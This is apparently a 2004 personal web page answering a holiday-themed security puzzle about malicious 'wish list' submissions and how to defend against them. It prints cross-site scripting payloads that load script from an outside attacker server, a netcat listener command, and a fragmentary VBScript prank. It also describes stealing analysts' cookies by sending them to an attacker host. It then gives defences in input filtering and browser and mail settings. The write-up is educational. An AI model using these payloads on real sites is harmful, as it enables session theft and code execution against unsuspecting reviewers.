Who am I?
Where & When
Olde Style Page
Math Puzzles

By Ron Sweeney

What is the purpose of the first malicious wish text, and how does it work? The purpose of the first text was to test whether the child could embed javascript into the wish form and reference a site outside of the submission server ("bumblesnowmonster.com.")

For example if the child put:

<IMG ID="Picture" HEIGHT=0 WIDTH=0 SRC="http://www.bumblesnowmonster.com/Sample.jpg" BORDER=0>

The analyst elf would see "nothing" or a broken image embedded in the submission. Typicallyyou can use a transparent 1 X 1 image to accomodate this task.

You could also tail the log of "bumblesnowmonster.com", bounce it off a rogue mail script, or setup nc -l -p 80 to see exactly when, with what reviewed the "wish."It could then be easily used to embed javascript like below (IE6) which refers to a script on the evil childs server (you could I supposed embed the whole javascriptif there are no controls in place to block <javascript tags):

<img src='http://www.bumblesnowmonster.com/clear.gif' onload='document.scripts(0).src="http://myserver/eviljavUrscript.js"'

This would make the script source the source of the first page and make the analyst's browser

load and execute the evil script. The script here could be something like:


Set WWObj = CreateObject("Word.Document")




document.write("I just ate 37 bytes on your hard drive")


<script LANGUAGE="VBScript">


Set oWMP = CreateObject("WMPlayer.OCX.7" )

Set colCDROMs = oWMP.cdromCollection

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1


Next ' cdrom

End If



which makes for a great coffee holder!

2. What is the purpose of the second malicious wish text, and how does it work?

The second wish actually embeds the elves cookie as an argument to a script on the "http://myserver" from there it can be "dug out" of the server requests on "myserver" so the evil children can acces the same list as the analysts. Probably write a cool script called naughty2nice.pl and post it to BUGTRAQ too.

3. How could Hermey and Rudolph thwart the first and second types of attacks by altering the

Web application? Alternatively, how could they stop these attacks by changing the configuration of the

analyst elves' browsers?

You can lock down the web application by disabling cross-site scripting or by ignoring certain input types in the text box for the front end of the submissions.

You can lock down down th broswers by locking down the browser to disable or prompt "access data sources across domains" or high settings on javUrscript.

4. Beyond these browser-based attacks, Hermey was also concerned about attackers submitting similar elements in children's wish lists submitted via e-mail. What are two different methods for defeating such attacks by altering an e-mail reader's configuration?

Turn off html or html with "preview" functionality on a mail reader. Also, some operating systems share the same security mechanism across mail readers and internet applications, in either case you can disable or prompt "access data sources across domains" in the same manner.


Send me some e-mail

©Copyright 2004, Ed Skoudis